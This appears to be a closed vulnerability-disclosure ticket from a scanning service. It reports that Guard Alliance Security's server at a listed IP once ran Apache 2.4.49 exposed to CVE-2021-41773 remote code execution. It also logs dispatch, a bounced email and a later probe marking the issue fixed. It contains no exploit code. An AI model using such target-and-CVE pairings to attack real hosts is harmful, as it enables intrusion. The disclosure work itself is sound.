
Guard Alliance Security / Apache 2.4.49 vulnerable to CVE-2021-41773

BloodyShell reported 2021-10-07

Your server was found vulnerable to CVE-2021-41773.

With mod_cgi installed, attackers are able to execute code on your server.

The CVE-2021-41773 prevention reports are identified and dispatched with the help of HaboubiAnis.

IP: 91.134.17.100
Port: 80
Detected protocol: http
Found processes through Apache RCE:

Found by Apache2449TraversalPlugin 2021-10-07
Report created by BloodyShell 2021-10-07
Report approved by zythop 2021-10-07
New PDF report generated by system 2021-10-07
Report dispatched to ...@... by system 2021-10-07
BloodyShell commented 2021-10-07: approved shows in report

Bounced, mail doesn't exist.

New PDF report generated by system 2021-10-07
Report comment dispatched to Info@guardalliancesecurity.com by system 2021-10-07
system commented 2021-11-03: approved shows in report

bip! I'm a LeakIX probe.

This issue looks like it has been resolved!

New PDF report generated by system 2021-11-03
Report comment dispatched to BloodyShell by system 2021-11-03
Report comment dispatched to Info@guardalliancesecurity.com by system 2021-11-03
Report marked as fixed by BloodyShell 2021-11-03
Report closed by BloodyShell 2021-11-03
New PDF report generated by system 2021-11-03
Information
Owner: Guard Alliance Security
Created: 2021-10-07 15:37
Updated: 2021-11-03 18:32
Fixed: true

Contacts
I...@guardalliancesecurity.com

Status
Status: closed
Hosting contacted: false
CERT contacted: false
